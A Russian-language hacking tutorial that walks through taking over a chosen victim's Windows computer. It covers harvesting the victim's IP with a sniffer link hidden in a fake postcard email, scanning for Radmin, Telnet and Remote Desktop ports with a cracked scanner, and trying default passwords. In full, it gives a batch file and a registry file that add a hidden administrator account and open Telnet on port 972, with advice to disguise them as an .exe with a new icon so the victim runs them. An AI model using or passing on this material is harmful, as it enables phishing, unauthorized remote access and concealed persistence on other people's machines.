- 1.) Предисловие
- 2.) Узнаем IP
- 3.) Анализируем полученные данные
- 4.) Если анализ ничего не дал?
- 5.) Теория
- 6.) Послесловие
================================================
1.) Предисловие.
Для того чтобы пользоваться этим методом, надо определиться, нужно ли это Вам в реальности, или Вам хочется просто развлечь себя и доказать, что Вы — лучший(ая). Последнее было для меня стимулом для того чтобы все это проделывать, но теперь я многое понял, а главное — понял то, что взлом не должен проводится чтобы доказать окружающим тебя людям, что ты «кулхацкер». Каким я себя не считаю. Многому надо научиться, и после практики, если все получилось, на мой взгляд, не надо от нечего делать взламывать чужие компьютеры. Итак, надеюсь с целью все определились, перейдем к действию?
================================================
2.) Узнаем IP.
Надеюсь ни для кого не секрет, что без IP, мы не сможем найти нужный нам компьютер, и следовательно — провести взлом. Так как же его узнать? (многие задаются этим вопросом и часто пишут мне на аську). Очень просто, нам потребуеются прямые руки, немного фантазии и онлайн сниффер.
Многие используют сниффер для увода cookies (куков, печенек, сессии — кому как нравится). Но в нашем случае, cookies нас не интересуют. Мы идем сюда и регистрируемся, если раньше этого не делали.
hacker-pro.net/sniffer/ (уже не работает - ищи другой)
Отлично. Пол дела сделанно. Теперь идем в «настройки», при необходимости загружаем свое изображение. И нам дается ссылка на сниффер, с редиректом (перенаправлением) на нашу картинку. Не забудьте поставить галочку на «записывать IP в лог». Надеюсь поняли о чем я? Нет?!
Тогда читайте.
Смысл в том, чтобы дать эту ссылку своей «жертве», но только со ссылкой cпрятанной в слове (изучаем html).
- Здравствуйте! На Ваш E-mail адрес была отправлена открытка, чтобы посмотреть ее, нажмите сюда
Это было самое легкое, советую придумать что-то более оригинальней. Всю эту муть отправляете жертве. При желании можно использовать сервисы анонимной отправки почты, или залить php скрипт, и самому сделать такой сервис.
Все, осталось жертве ПЕРЕЙТИ «посмотреть картинку», как IP палится в логе.
Не надо ничего никуда вводить, как в случае с фейком. В итоге все довольны, он (она), получила свою открытку, а Вы IP.
====================================================
3.) Анализируем полученные данные
Теперь, у нас есть главное, без чего была бы невозможна дальнейшая работа. Дальнейшие действия — проверить хост (компьютер) на наличие уязвимостей — открытых портов. Я для этих целей пользуюсь сканером [XSpider 7.5], Вы можете использовать любой другой, на Ваш вкус. Но лучше всего использовать несколько сканеров, что не покажет один — покажет другой.
Сразу качаем себе [XSpider 7.5] отсюда — http://www.softportal.com/software-1453-xspider.html
Обновлять не рекомендую, так как версия крякнутая, и полностью рабочая.
Теперь когда Вы скачали его, необходимо его настроить — создать новый профиль. Кто-то на сайте описывал настройку профиля, но чтобы Вам не приходилось искать статью, я Вам опишу настройку.
Открываете сканер
- »>Профиль
- »>Новый…
- »>Комментарий (пишите что хотите)
- »>Идете на вкладку «Сканер Портов», и внизу рядом с надписью «default.prt» давите [...]
- »>Выйдет окошко, давите «новый»
- »>Пустой
- »>В комментах пишите что угодно
- »>внизу увидеть «добавить порты» и пишите «4899» и «3389»
- »>Сохранить как «4899».
- »>Дольше выходите обратно на вкладки, и снимаете отовсюду галки.
- Точно также создаете еще 1 профиль, только порт 23. Все.
- Теперь вбиваете IP своей жертвы, в поле «добавить хост» и начинаете сканировать. Если вдруг открытым оказался один из портов 4899 — Radmin, 23 — telnet, 3389 — Remote Desktop (удаленный рабочий стол) — пробуете законнектиться (подключиться). Пароль по дефолту 12345678, об этом уже писалось. Самое лучшее (для меня), когда открыт 4899 порт (Radmin). Подключились? Радуйтсь!
но чтобы не палиться, рекомендую Вам убрать иконку в трее (рядом с часиками), и создать нового пользователя, с правами администратора. (об этом между прочим тоже писалось раньше) — не буду писать, а то статья очень большая получится.
Remote Desktop входит в стандартную комплектацию Windows.
RAdmin Viewer думаю сами в интернете найдёте
В нем же есть и telnet
P>S
RAdmin тоже входит в стандартную комплектацию.
Если не получилось подключиться, не отчаиваемся, читаем дальше.
=====================================================
4.) Если анализ ничего не дал?
Если он ничего не дал, то можно своими усилиями помочь себе. Делается это просто, серверная часть устанавливается на удаленный компьютер/открывается нужный порт с нужным логином и паролем. Конечно, но как установить/открыть, если компьютер далеко???
— А для чего интернет?? WWW — World Wide Web — ВСЕМИРНАЯ паутина.
Через интернет тоже можно установить программу на чужой компьютер/или открыть доступ к уже существующему.
Radmin если что, тоже идет в стандартной комплектации Windows. А установить, что это действительно Windows, можно тем же сканером. Значит — нам остается только открыть доступ к этому сервису (23). Об этом до нас тоже позаботились, и написали вот такой *.txt файл, который в последствии переименовывается в *.bat.
Затем создается еще один файл, файл конфигурации реестра, который скрывает нового пользователя с глаз, и его не видно в окне приветствия.
содержимое *.bat файла
++++
chcp 1251
net user SUPPORT_388945a0 /delete
net user restot 12345678 /add
net localgroup Администраторы restot /add
net localgroup Пользователи SUPPORT_388945a0 /del
regedit /s conf.reg
sc config tlntsvr start= auto
tlntadmn config port=972 sec=-NTLM
net start Telnet
++++
Этим файлом Вы создаете нового пользователя с именем restot и паролем 12345678
- импортируете в реестр настройки, которые скроют Ваше имя в окне приветствия.
- открываете 972 порт, и активируете телнет через него.
- Записывается без плюсиков в блокнот, потом меняется расширение на *.bat
- теперь содержимое файла conf.reg
- ++++
- Windows Registry Editor Version 5.00
- [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows
- NTCurrentVersionWinlogonSpecialAccountsUserLis t]
- «restot»=dword:00000000
- ++++
Также записываете в блокнот, а потом меняете расширение на *.reg
Сохраняете все это в одной папке, можно просто заархивировать оба файла в один архив, а можно поступить умнее, скомпилировать файл *.bat в файл *.exe, и также добавить в архив поменяв иконку, об этом читайте в статьях на портале. После того как жертва запустит батник, можно будет коннектиться к 972 порту, или к любому другому, главное чтобы не был занят...
Затем можно установить то что нужно через службу Telnet, и более комфортно управлять удаленной машиной.
==========================================================
5.) Теория
- находите жертву »> узнаете ip »> проверяете на наличие открытых портов »> открываете порты (если открытых не было) »> устанавливаете через telnet то что нужно для удобство »> осуществляете свой злобный план…